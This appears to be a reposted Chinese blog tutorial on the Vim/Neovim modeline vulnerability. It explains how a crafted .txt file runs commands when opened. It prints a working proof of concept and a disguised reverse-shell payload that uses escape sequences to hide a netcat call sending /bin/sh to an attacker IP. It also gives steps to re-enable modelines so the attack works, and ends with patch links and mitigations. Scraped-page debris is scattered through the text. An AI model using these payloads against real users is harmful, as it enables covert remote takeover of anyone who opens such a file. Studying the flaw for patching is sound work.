丢给你一个txt并同时获取你shell

时间 2019-12-12

标签一个 txt 并同获取 shell 栏目 Unix 繁體版

原文原文链接

丢给你一个txt并同时获取你shell

0x00：回顾git

《文本编辑器Vim/Neovim被曝任意代码执行漏洞》github

听闻不少人知道这个漏洞，可是有一部分人能复现成功，一部分人复现不出来。这里我就我本身的复现经历给你们演示一下。shell

git clone https://github.com/numirias/security.gitvim

0x01：复现编辑器

一、kali复现插件

桌面新创建一个poc.txt放入如下代码，并用vim执行。blog

代码：rem

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="get

效果图：it

成功执行

反弹shell脚本

新创建一个shell.txt放入如下代码，Ip跟端口改为你本身的，并用vim执行。

代码：

\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 192.168.124.14 6666 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n

执行后报错：

提示：处理模型行时检测到错误！！

处理方式：

在50行这里添加一个“set modeline” 而后esc保存退出，而后执行

source ~/.vimrc让它生效。

本地开启监听

kali用vim执行txt

本机获得shell

0x02:防范

Vim补丁8.1.1365

https://github.com/vim/vim/commit/5357552
Neovim补丁（在v0.3.6中发布）

https://github.com/neovim/neovim/pull/10082

https://github.com/neovim/neovim/releases/tag/v0.3.6

除了修补以外，建议在vimrc（set nomodeline）中禁用model，使用securemodelines 插件，或者禁用modelineexpr（由于补丁8.1.1366，仅限Vim）以禁用model中的表达式。

声明：本文章转自公众号：luomiweixiong 若有侵权联系博主删除